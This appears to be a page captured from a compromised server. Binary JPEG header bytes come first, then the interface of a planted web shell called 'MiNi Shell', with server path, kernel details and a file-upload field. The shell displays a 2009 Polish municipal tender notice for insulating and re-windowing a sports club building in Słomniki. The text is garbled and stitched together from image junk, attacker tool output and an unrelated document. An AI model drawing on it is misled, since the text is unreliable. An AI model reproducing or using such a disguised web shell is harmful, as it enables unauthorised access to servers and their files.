JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090525/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090525/165648-N-2009.html

<p class="kh_header"><b>Słomniki: Termomodernizacja  budynku LKS Słomniczanka nr 61a, wraz z wymianą stolarki okiennej w ramach istniejących nadproży na działkach nr ewidencyjny 167, 168/1 w Prandocinie Wysiołku</b><br>
<b>Numer ogłoszenia: 165648 - 2009; data zamieszczenia: 25.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Słomniki , ul. Kościuszki 64, 32-090 Słomniki, woj. małopolskie, tel. 012 3881102, faks 012 3882102.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.slomniki.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja  budynku LKS Słomniczanka nr 61a, wraz z wymianą stolarki okiennej w ramach istniejących nadproży na działkach nr ewidencyjny 167, 168/1 w Prandocinie Wysiołku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Roboty w budynku LKS Słomniczanka w Słomnikach obejmują:
-roboty budowlano-wykończeniowe termomodernizacji budynku 
-Wymianę stolarki okiennej w ramach istniejących nadproży 

	Zakres robót budowlano-wykończeniowych termomodernizacji budynku LKS Słomniczanka w Słomnikach obejmuje:

-	ocieplenie ścian zewnętrznych (ok. 843 m2) kondygnacji nadziemnych styropianem gr. 12 cm, metodą lekką -mokrą,
	do wysokości 60 cm powyżej gruntu (ok. 72 m2) pokryć warstwą tynku mozaikowego, celem zabezpieczenia przed działaniem wody opadowej odbijającej się od opaski z płyt chodnikowych wokół budynku, powyżej wykończyć tynkiem sylikatowym,
-	ocieplenie ościeży (ok. 71 m2) styropianem gr 3 cm
-	ocieplenie styropianem gr 3 cm i wyprawa kominów (ok. 35,5 m2) nad dachem tynkiem cienkowarstwowym na siatce zbrojeniowej z włókna szklanego zatopionego w zaprawie klejowej, wraz z okuciem dekarskim czap kominowych w kolorze blachy dachówkowej.
-	wymiana parapetów (ok. 57 mb) zewnętrznych (podokienne) na nowe (malowane proszkowo),
Prace towarzyszące:
-	drzwi kotłowni (ok. 7,8 m2) oczyścić z rdzy i pokryć odpowiednią farbą,
-	otwory wentylacyjne znajdujące się w ścianach zewnętrznych budynku, podczas wykonywania prac ociepleniowych ścian zewnętrznych, należy zabezpieczyć przed przysłonięciem warstwą izolacji, a po wykonaniu prac ociepleniowych, przed zamontowaniem kratek wentylacyjnych, należy sprawdzić ich drożność.
Łączna powierzchnia kratek wentylacyjnych winna wynieść co najmniej 0,001 m2  powierzchni dachu. Powierzchnia stropodachu ocieplanego wynosi ok.135 m2 zatem łączna powierzchnia otworów wentylacyjnych winna wynieść 0,135 m2, co przy wymiarach otworów 0,15 × 0,15 daje minimum 6 otworów (wymagana liczba kratek wentylacyjnych).
-	kraty w oknach (18 szt), na czas wykonywania prac ociepleniowych należy zdemontować, przed ponownym ich zamontowaniem należy oczyścić i pomalować (łącznie ok. 77,5 m2). Wielkość krat w oknach sali gimnastycznej należy pomniejszyć w celu dostosowania wielkości ram krat do otworów okiennych (ościeża ocieplane 3 cm warstwą styropianu).
-	oprawy oświetleniowe na ścianach zewnętrznych , tablice informacyjne, uchwyty na flagi itp., należy zdemontować, a po wykonaniu prac ociepleniowych zamontować powtórnie po uprzednim wyczyszczeniu i pomalowaniu (tablice informacyjne zabezpieczyć od spodu),
-	prowadzone okablowania po elewacji, w uzgodnieniu z Inwestorem należy pochować w korytkach pod warstwą ocieplenia,
-	 uszczelnić dylatacje (dobudówek - pom. kotłowni i kuchni),
-	rury spustowe zniszczone wymienić na nowe z pcv,
-	wszystkie pozostałe opakowania z materiałów użytych do ocieplenia po zakończeniu prac usunąć z placu budowy,
-	wywóz zdemontowanych parapetów i okuć dekarskich,
-	ocieplenie stropodachu (ok. 135 m2) wentylowanego nad częścią socjalną i kotłownią z użyciem z wełny mineralnej gr. 20 cm ułożonej na stropie +2 × folia,
-	wykonanie podbiciówki szczelnej (ok. 170 m2), w części dachu wystającej poza obrys budynku, deskami felcowanymi. Deski gr. min.1,2 cm przed ich wbiciem zagruntować środkami impregnującymi wraz z bejcą koloryzującą.
-	uzupełnienie i wyrównanie opasek z płyt chodnikowych 50 × 50 wokół budynku,

Do ocieplenia ścian należy zastosować płyty styropianowe klasy EPS 70 - 40 o deklarowanym poziomie naprężeń ściskających nie mniejszym niż 70 kPa i deklarowanej wytrzymałości na zginanie minimum 115 kPa


	Wymiana stolarki okiennej w ramach istniejących nadproży w budynku LKS Słomniczanka w Słomnikach obejmuje
wymianę stolarki okiennej (patrz załącznik nr 1):
- okien metalowych na sali gimnastycznej na PCV;
- 150 × 405 × 9 szt,
- okien drewnianych na PCV;
- 150 × 150 × 12 szt,
- 150 × 115 × 5 szt,
- 125 × 90 × 3 szt,
- 110 × 75 × 3 szt,
Łącznie ok. 96,15 m2
UWAGA!
Podane powyżej wymiary są wystarczające dla sporządzenia przedmiaru i kosztorysu inwestorskiego, natomiast Dostawca stolarki jest zobowiązany do dokonania własnych pomiarów na obiekcie..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.00.00-2, 45.32.10.00-3, 45.32.40.00-4, 45.42.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Wadium.
Zamawiający wymaga wniesienie wadium

Ustala się wniesienie wadium w wysokości
4.000,00 zł słownie cztery tysiące złotych

Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:

1.	w pieniądzu, sposób przekazania: przelew na konto zamawiającego BS Słomniki 
      39 8614 0001 0000 0000 0420 0019 
      Za skuteczne wniesienie wadium w pieniądzu, Zamawiający uważa wadium, które 
w oznaczonym terminie (przed upływem terminu składania ofert) znajdzie się na koncie Zamawiającego - data uznania rachunku Zamawiającego (zaleca się przelew najpóźniej do dnia poprzedzającego dzień składania ofert z uwagi na operacje bankowe). 
      
Wpłacając wadium w formie przelewu w tytule  należy wpisać :wadium na przetarg Termomodernizacja LKS Słomniczanka- oraz podać nazwę Wykonawcy składającego ofertę 

2.	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym, 
3.	w gwarancjach bankowych
4.	w gwarancjach ubezpieczeniowych 
5.	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158, z p. zm.) 

sposób przekazania wadium w formie dokumentów: oryginał Kasa Urzędu Miejskiego w Słomnikach ul. Kościuszki 64, kopię należy dołączyć do oferty

4. Zwrot wadium nastąpi:
Zamawiający zwraca niezwłocznie wadium
4.	po upływie terminu związania z ofertą 
5.	po zawarciu umowy w sprawie zamówienia publicznego wraz z wniesieniem zabezpieczenia należytego wykonania umowy.
6.	Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
Z zastrzeżeniem ust. 4A,Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy
7.	który wycofał ofertę przed upływem terminu składania ofert. 
8.	który został wykluczony z postępowania
9.	którego oferta została odrzucona 
 Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń potwierdzających spełnienie warunków udziału w postępowaniu, o których mowa w art.25 ust.1, lub pełnomocnictw chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
5. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana :
10.	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie.
11.	Nie wniósł wymaganego zabezpieczenia należytego wykonania umowy.
12.	Zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.

 W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Warunki udziału w postępowaniu o zamówienie publiczne.

O udzielenie zamówienie mogą ubiegać się wykonawcy potwierdzający spełnienie warunków:
1.1	Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
1.2	Posiadający niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia; lub którzy przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
 1.3	Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
1.4	Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia. 

2. Ocena spełnienia warunków w postępowaniu o zamówienie publiczne
Z ubiegania się o zamówienia publicznego wyklucza się wykonawców, którzy:
-nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa zamówień publicznych opisanych w ppkt. 1.1 do 1.4, 
-podlegają  wykluczeniu z postępowania na podstawie art. 24 ust. 1 Prawa zamówień publicznych.
-wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności chyba, że udział tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji, 
-złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania, 
-nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków z zastrzeżeniem art. 26 ust. 3, PZP	
-nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub nie zgodzili się na przedłużenie okresu związania ofertą, 

3. Zamawiający odrzuca ofertę wykonawcy:
-niezgodną z ustawą lub której treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art.87 ust.2 pkt.3 Prawa zamówień publicznych
-jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, 
-zawierającą rażąco niską cenę w stosunku do przedmiotu zamówienia,  
-została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia.
-zawiera błędy w obliczeniu ceny 
- wykonawcy który  w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych 
-nieważną na podstawie odrębnych przepisów, 
-nie zabezpieczoną wadium, w tym również na przedłużony okres związania ofertą, lub który nie wyraził zgody na przedłużenie okresu związania ofertą,

4.Ofertę wykonawcy wykluczonego uznaje się za odrzuconą
5.Zamawiający dokona oceny  spełnienia warunków udziału w postępowaniu na podstawie złożonych wraz z ofertą dokumentów potwierdzających spełnienie warunków.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. Na ofertę składają się następujące dokumenty i załączniki:
      -Formularz ofertowy -  z wykorzystaniem wzoru - załącznik nr 1 do SIWZ 
-Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne-  z wykorzystaniem wzoru - załącznik nr  2 do SIWZ 
      - Projekt umowy - parafowany z wykorzystaniem wzoru - załącznik nr 3 do SIWZ 
      -Kosztorys ofertowy - opracowane na podstawie przedmiarów robót w formie szczegółowej (zał. Specyfikacja techniczna)
-wykaz osób do kontaktów z zamawiającym odpowiedzialnych za wykonanie zobowiązań umowy -z wykorzystaniem wzoru - załącznik nr 4 do SIWZ    
-informacje o powierzeniu robót podwykonawcom - zał. nr 7 do SIWZ
-oferowane warunki gwarancji -z wykorzystaniem wzoru -załącznik nr 8 do SIWZ


B.W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych składa następujące dokumenty:

  B.2) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
   B.3) Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile fakt nie wynika z przedstawionych dokumentów rejestrowych.  
   B.4) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert  
   B.5) Aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
  B.6) Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  

C.W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty:
 
C.1) Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności.( wzór zał 5 do SIWZ)
C1.1 pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie tym wykonawca wskazał osoby, którymi będzie dysponował.  
C.2) Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia t.j.  uprawnienia  budowlane do kierowania robotami budowlanymi  wraz z przynależnością  do właściwej Izby Inżynierów i Techników jeżeli ustaw nakładają obowiązek posiadania takich uprawnień. 
C.3) wykaz wykonanych robót w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia , a jeżeli okres działalności jest krótszy , w tym okresie - co najmniej dwie roboty budowlane polegające na ociepleniu ścian zewnętrznych budynków metoda lekką -mokra o powierzchni poszczególnych obiektów nie mniejszej niż 500 m2) z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów  potwierdzających ich należyte wykonanie. (wzór zał 6 do SIWZ)

D.W celu potwierdzenia spełnienia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć następujące dokumenty:
  
D.1) -Polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.  
  C.2) Informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy minimum 100.000,00 zł wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu.  

E. Wykonawca  zamieszkały poza terytorium Rzeczypospolitej Polskiej:

 E.1) Zamiast dokumentów, o których mowa w pkt. B.2), B.4), B.6) składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu.
2) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu 

E.2) Zamiast dokumentu, o którym mowa w pkt. B.6) składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Prawo zamówień publicznych - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu. 
  -Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt. E  zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w terminach określonych w niniejszym pkt. E.   

F. Dokumenty wymagane w przypadku składania oferty wspólnej: 

  - Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt. VI dla każdego  partnera z osobna, pozostałe dokumenty składane są wspólnie   

Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę / osoby uprawnione do podpisania oferty z dopiskiem -za zgodność z oryginałem.

Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.slomniki.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Słomniki, Urząd Miejski w Słomnikach 32-090 Słomniki ul. Kościuszki 64.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.06.2009 godzina 11:00, miejsce: Gmina Słomniki, Urząd Miejski w Słomnikach Ulica Kościuszki  64
Kod 32-090 Miejscowość Słomniki
dziennik  podawczy.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com